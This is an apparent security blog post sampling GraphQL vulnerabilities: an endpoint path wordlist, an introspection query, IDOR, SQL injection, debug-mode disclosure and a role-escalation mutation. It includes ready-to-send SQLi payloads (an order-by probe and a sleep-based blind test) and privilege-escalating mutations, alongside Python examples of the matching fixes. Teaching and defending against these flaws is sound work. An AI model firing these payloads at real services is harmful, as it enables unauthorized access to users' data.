AlbusSec:- Penetration-List 13 GraphQL Vulnerabilities — Sample
Hi Information Security folks, I hope you liked my previous article on Application Programming Interface (API) vulnerabilities. Today we'll learn about the vulnerabilities that have been found in the very popular query language GraphQL. As we know, whenever a new technology arrives, new vulnerabilities arise with it. Before we start, I will introduce myself: I'm Aniket Tyagi, an Information Technology officer at the 5f eco foundation of India, an Information Security Researcher and the founder of Albus Security. Without wasting our energy, let's get started.
Introduction to GraphQL:-
GraphQL is an open-source data query language (DQL) and data manipulation language (DML). One of its benefits is that it offers a more efficient and powerful alternative to approaches such as REST. It's worth noting that GraphQL isn't tied to any particular database or storage engine; it relies on the application's existing code. Unlike a REST API, where the client talks directly to the arbitrary code the programmer wrote, the client first talks to GraphQL, which then calls that arbitrary code before finally reaching the database. GraphQL makes life easier for applications because a client using GraphQL doesn't have to send multiple requests to the API; a single request can gather all the information.
Now let's talk about the vulnerabilities found in GraphQL. By default GraphQL does not implement authentication, which means the endpoint is available to everyone and anyone can send a query, and a malicious actor may use it to access sensitive information. Because it is a comparatively new query language, it gives an attacker advantages such as Information Disclosure (PII leaks), Insecure Direct Object References (IDOR) and Broken Access Control, all of which can be exploited on a GraphQL endpoint.
Common paths at which a GraphQL endpoint, its playground, or its schema may be exposed:
graphiql.css
graphiql/finland
graphiql.js
graphiql.min.css
graphiql.min.js
graphiql.php
graphql/console
graphql-explorer
graphql.php
graphql/schema.json
graphql/schema.xml
graphql/schema.yaml
graphql
v1/graphql
v1/explorer
v1/graphiql
v1/graphiql.css
v1/graphiql/finland
v1/graphiql.js
v1/graphiql.min.css
v1/graphiql.min.js
v1/graphiql.php
v1/graphql
v1/graphql/console
v1/graphql-explorer
v1/graphql.php
v1/graphql/schema.json
v1/graphql/schema.xml
v1/graphql/schema.yaml
v1/playground
v1/subscriptions
Whenever you access a GraphQL endpoint, start with introspection. Introspection is the mechanism for asking the graph which resources are available in the current API schema; it reveals the queries, types, fields and directives the API supports.
If you want to learn more about introspection, visit GraphQL Online Learn. You can use the following query to run a full introspection against your target:
{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}
fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}
fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}
fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
Sometimes an application disables introspection for security purposes. Without wasting time, start investigating what they don't want us to see. One feature of GraphQL is that it suggests fields and operations when the user enters a wrong query. For example, if you try to query a field but make a typo, GraphQL will suggest a field similar to the one you were trying to query.
[Image: GraphQL field-suggestion feature]
Also, if an application has disabled introspection, you can use this tool to extract the GraphQL options.
Another thing to keep in mind is that sometimes an application only allows certain HTTP request methods (GET, POST, HEAD, OPTIONS, etc.). Therefore, if you get Forbidden or Not Allowed, try changing the request method.
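The two hardening controls implied by this section are disabling introspection in production and suppressing the "Did you mean" field suggestions that reference implementations append to unknown-field errors. Real servers expose this as a setting (Apollo Server, for example, has an introspection option), but the logic is small enough to show stand-alone. The block below is an added example and not code from the article; gate_query, uses_introspection and sanitize_error are hypothetical helper names, and the error message text is modelled on the graphql-js style.

```python
import re
from typing import Any, Dict

# Introspection root fields. __typename is deliberately not listed: it only
# returns the name of the object's own type and many clients rely on it.
INTROSPECTION_FIELDS = {"__schema", "__type"}

# A GraphQL Name per the spec grammar.
NAME_RE = re.compile(r"[_A-Za-z][_0-9A-Za-z]*")
# Double-quoted string literal (with escapes), used to blank argument strings.
STRING_RE = re.compile(r'"(?:\\.|[^"\\])*"')


def uses_introspection(query: str) -> bool:
    """True if the document selects __schema or __type anywhere.

    String literals are blanked first so that an argument such as
    search(term: "__schema") is not mistaken for an introspection field.
    """
    stripped = STRING_RE.sub('""', query)
    return any(tok in INTROSPECTION_FIELDS for tok in NAME_RE.findall(stripped))


def sanitize_error(message: str, production: bool) -> str:
    """Strip the 'Did you mean ...?' suggestion that reference servers append to
    unknown-field errors; in production the suggestion leaks schema names."""
    if not production:
        return message
    return re.sub(r"\s*Did you mean\b.*$", "", message, flags=re.DOTALL)


def gate_query(query: str, production: bool) -> Dict[str, Any]:
    """Pre-execution gate (hypothetical helper, not a real GraphQL library API).
    Returns the JSON-shaped response the server would send, or {"ok": True}
    when the query may proceed to the normal validation/execution pipeline."""
    if production and uses_introspection(query):
        return {"data": None, "errors": [{"message": "Introspection is disabled."}]}
    return {"ok": True}


if __name__ == "__main__":
    # Constructed inputs: an introspection query and a typo'd field error.
    print(gate_query("{__schema{types{name}}}", production=True))
    print(sanitize_error('Cannot query field "nam" on type "User". Did you mean "name"?',
                         production=True))
```

The gate runs before validation, so it also blocks the compact single-line introspection query shown earlier; leaving __typename allowed keeps ordinary clients working while still hiding the schema.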
#1 Vulnerability: Improper Query Implementation:-
In the introspection output, you can find objects that you can query directly. In the following image, you can see that the "card number" query takes the parameter "userid"; this request returns information about that particular user from the listed bank.
query {
  Cardnumber(userid: 1337) {
    CVE
    name
  }
}
Suppose the application only checks the userid parameter before proceeding. Then a malicious user can change that value and obtain the card details of another registered account.
query {
  Cardnumber(userid: 1) {
    CVE
    name
  }
}
This query flaw is essentially an Insecure Direct Object Reference (IDOR).
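The root cause of the IDOR above is a resolver that locates a record by the userid argument and never asks whether the caller is allowed to see it. The following added example (not code from the article) shows the vulnerable resolver beside a hardened one that decides access from the request context, which a GraphQL server populates from the verified session or token. Context, CARDS, is_authorized and the two resolve_cardnumber functions are hypothetical names, and the card records are constructed fake data.

```python
from dataclasses import dataclass
from typing import Any, Dict, Optional

# Constructed sample data standing in for the bank's card table (fake values).
CARDS: Dict[int, Dict[str, Any]] = {
    1: {"userid": 1, "name": "Alice Example", "last4": "0001"},
    1337: {"userid": 1337, "name": "Bob Example", "last4": "1337"},
}


@dataclass(frozen=True)
class Context:
    """Per-request context a GraphQL server hands to every resolver.
    user_id comes from the verified session or token, never from query arguments."""
    user_id: Optional[int]
    is_admin: bool = False


def is_authorized(ctx: Context, userid: int) -> bool:
    """Object-level check: the caller must be the record's owner or an admin."""
    if ctx.user_id is None:
        return False
    return userid == ctx.user_id or ctx.is_admin


def resolve_cardnumber_vulnerable(ctx: Context, userid: int) -> Dict[str, Any]:
    """The flaw from the article: the resolver trusts the userid argument and
    only checks that the record exists, so any caller can read any user's card."""
    card = CARDS.get(userid)
    return {"data": {"Cardnumber": card}}


def resolve_cardnumber(ctx: Context, userid: int) -> Dict[str, Any]:
    """Hardened resolver: the argument still locates the record, but whether the
    caller may see it is decided from ctx, not from the argument."""
    if not is_authorized(ctx, userid):
        return {"data": None, "errors": [{"message": "not authorized"}]}
    return {"data": {"Cardnumber": CARDS.get(userid)}}


if __name__ == "__main__":
    # A caller logged in as user 1337 asks for user 1's card.
    attacker = Context(user_id=1337)
    print(resolve_cardnumber_vulnerable(attacker, 1))   # returns Alice's record
    print(resolve_cardnumber(attacker, 1))              # errors: not authorized
```

The check belongs in the resolver (or a shared data-access layer) rather than at the HTTP edge, because a single GraphQL request can reach many objects through nested fields and aliases.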
#2 Vulnerability: SQL-Injection:-
As I explained earlier, GraphQL interacts with arbitrary code written by the programmers. GraphQL does not protect against all types of attacks on its own, so if the application adds no protective measures of its own, there is a high chance that it is vulnerable to SQL injection. If you don't know about SQLi yet, learn about SQL-Injection first. Now suppose you have a mutation called email, which is used to update an email address. If the application is vulnerable to SQLi, you can try to generate an error by giving the database an odd value:
mutation {
  registerAccount(nickname: "hacker ' order by 1,2,3,4 #") {
    user {
      email
      nickname
      role
    }
  }
}
Likewise, if a server is not vulnerable to union-based or error-based SQLi, you should try blind SQLi:
mutation {
  registerAccount(nickname: "hacker ') and if(substr(database(),1,1)=\"s\",sleep(3),null #") {
    user {
      email
      nickname
      role
    }
  }
}
You can also automate this with the help of sqlmap.
#3 Vulnerability: Information Disclosure:-
Sometimes an application runs in debug mode, so if you can generate an error in GraphQL there is a high chance of getting some juicy information about the application. To do this, add some unwanted value to an object or parameter.
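Sections #2 and #3 share one resolver-level fix, so one added example (not code from the article) serves both: a registerAccount resolver that splices the nickname into SQL text beside one that binds it as a parameter, wrapped in a response builder that hides the database's own error message unless debug mode is on. It uses the article's odd nickname value as input against an in-memory SQLite table (constructed here so the example runs offline); the table layout, the function names and the debug flag are assumptions, and SQLite's reaction to the value differs from MySQL's, which is what the article's sleep() payload targets.

```python
import sqlite3
from typing import Any, Callable, Dict

# Input value taken from the article's first mutation example.
ODD_NICKNAME = "hacker ' order by 1,2,3,4 #"


def _connect() -> sqlite3.Connection:
    """In-memory database with a constructed users table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, nickname TEXT NOT NULL)")
    return conn


def register_account_vulnerable(conn: sqlite3.Connection, nickname: str) -> int:
    """Resolver that splices the nickname into the SQL text. The quote in the
    nickname ends the string literal and the rest becomes SQL; SQLite rejects
    this particular statement as a syntax error, which is exactly the error the
    article uses as a signal."""
    cur = conn.execute(f"INSERT INTO users (nickname) VALUES ('{nickname}')")
    return cur.lastrowid


def register_account(conn: sqlite3.Connection, nickname: str) -> int:
    """Hardened resolver: parameter binding keeps the nickname as data, so the
    same odd value is simply stored verbatim."""
    cur = conn.execute("INSERT INTO users (nickname) VALUES (?)", (nickname,))
    return cur.lastrowid


def execute_mutation(resolver: Callable[[sqlite3.Connection, str], int],
                     nickname: str, debug: bool = False) -> Dict[str, Any]:
    """Build the GraphQL-style response. A failing resolver still yields an
    error entry, but the database's own message is included only in debug mode;
    with debug on, the error text tells the client about the backend (the
    information disclosure described under #3)."""
    conn = _connect()
    try:
        new_id = resolver(conn, nickname)
        row = conn.execute("SELECT nickname FROM users WHERE id = ?", (new_id,)).fetchone()
        return {"data": {"registerAccount": {"user": {"id": new_id, "nickname": row[0]}}}}
    except sqlite3.Error as exc:
        message = f"database error: {exc}" if debug else "internal server error"
        return {"data": None, "errors": [{"message": message}]}
    finally:
        conn.close()


if __name__ == "__main__":
    print(execute_mutation(register_account_vulnerable, ODD_NICKNAME, debug=True))
    print(execute_mutation(register_account_vulnerable, ODD_NICKNAME))
    print(execute_mutation(register_account, ODD_NICKNAME))
```

Binding parameters removes the injection; the generic error message removes the debug-mode leak, and the real exception should go to server-side logs where an error spike on one mutation is itself a useful detection signal.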
#4 Vulnerability: Improper Access Control:-
Whenever an application wants to perform or change actions on data, it sends a mutation. Mutations therefore carry problems similar to the Mass Assignment vulnerability. Suppose an application has a mutation called "delete account" with fields like accounting and state, and after sending the mutation you can see another field, role, in the response. If you add the role field to the mutation and change its value from user to admin, you gain the ability to delete any account with admin access. GraphQL makes it difficult for developers to manage all of these things perfectly.
mutation {
  Deleteaccount(nickname: "hacker", role: "Admin") {
    user {
      email
      nickname
      role
    }
  }
}
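The mass-assignment flaw above exists when a handler merges whatever arguments arrive into the object it acts on and then reads the caller's role from that merged object. The added example below (not the article's code) shows that handler beside a hardened one that accepts only an allowlisted set of input fields and takes the role from the server's own account record. In a typed GraphQL schema the equivalent of the allowlist is simply not declaring role on the mutation's input type; this block spells the check out so it runs stand-alone. DELETE_ACCOUNT_INPUT, make_accounts and the delete_account functions are hypothetical names, and the account records are constructed fake data.

```python
from typing import Any, Dict

# Fields the DeleteAccount mutation accepts from the client. "role" is not among
# them: it is an attribute of the caller's account and must come from server state.
DELETE_ACCOUNT_INPUT = frozenset({"nickname"})


def make_accounts() -> Dict[str, Dict[str, str]]:
    """Constructed sample account store (fresh copy per call so callers can mutate it)."""
    return {
        "hacker": {"nickname": "hacker", "email": "hacker@example.invalid", "role": "user"},
        "victim": {"nickname": "victim", "email": "victim@example.invalid", "role": "user"},
        "ops": {"nickname": "ops", "email": "ops@example.invalid", "role": "admin"},
    }


def _error(message: str) -> Dict[str, Any]:
    return {"data": None, "errors": [{"message": message}]}


def _delete(accounts: Dict[str, Dict[str, str]], target: str) -> Dict[str, Any]:
    del accounts[target]
    return {"data": {"deleteAccount": {"deleted": target}}}


def delete_account_vulnerable(accounts: Dict[str, Dict[str, str]], session_user: str,
                              args: Dict[str, Any]) -> Dict[str, Any]:
    """Mass-assignment flaw: the handler merges every mutation argument over the
    caller's stored attributes, so a client-supplied role: "Admin" replaces the
    real role before the authorization check reads it."""
    actor = {**accounts[session_user], **args}          # role can be overwritten here
    target = args["nickname"]
    if target not in accounts:
        return _error("no such account")
    if target != session_user and actor["role"].lower() != "admin":
        return _error("only admins may delete other accounts")
    return _delete(accounts, target)


def delete_account(accounts: Dict[str, Dict[str, str]], session_user: str,
                   args: Dict[str, Any]) -> Dict[str, Any]:
    """Hardened handler: reject arguments outside the allowlist and take the
    caller's role from the server's own record, never from the request."""
    unknown = sorted(set(args) - DELETE_ACCOUNT_INPUT)
    if unknown:
        return _error("unknown input field(s): " + ", ".join(unknown))
    target = args["nickname"]
    if target not in accounts:
        return _error("no such account")
    role = accounts[session_user]["role"]              # authoritative value
    if target != session_user and role.lower() != "admin":
        return _error("only admins may delete other accounts")
    return _delete(accounts, target)


if __name__ == "__main__":
    # The article's mutation: user "hacker" sends role: "Admin" with the request.
    request = {"nickname": "victim", "role": "Admin"}
    print(delete_account_vulnerable(make_accounts(), "hacker", request))   # deletes victim
    print(delete_account(make_accounts(), "hacker", request))              # rejected
```

Rejecting unknown fields outright, rather than silently dropping them, also gives the server a log line to alert on when a client starts sending fields the schema never offered.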
Finally, we've completed our "GraphQL Vulnerabilities" sample article. As usual, here is an update for everyone: I'll upload topics to Medium as samples rather than full sections, because I've started writing a book. That's why I won't upload the whole thing on Medium; upcoming writeups will be uploaded as samples. Thank you for reading.
You can download a sample of the book: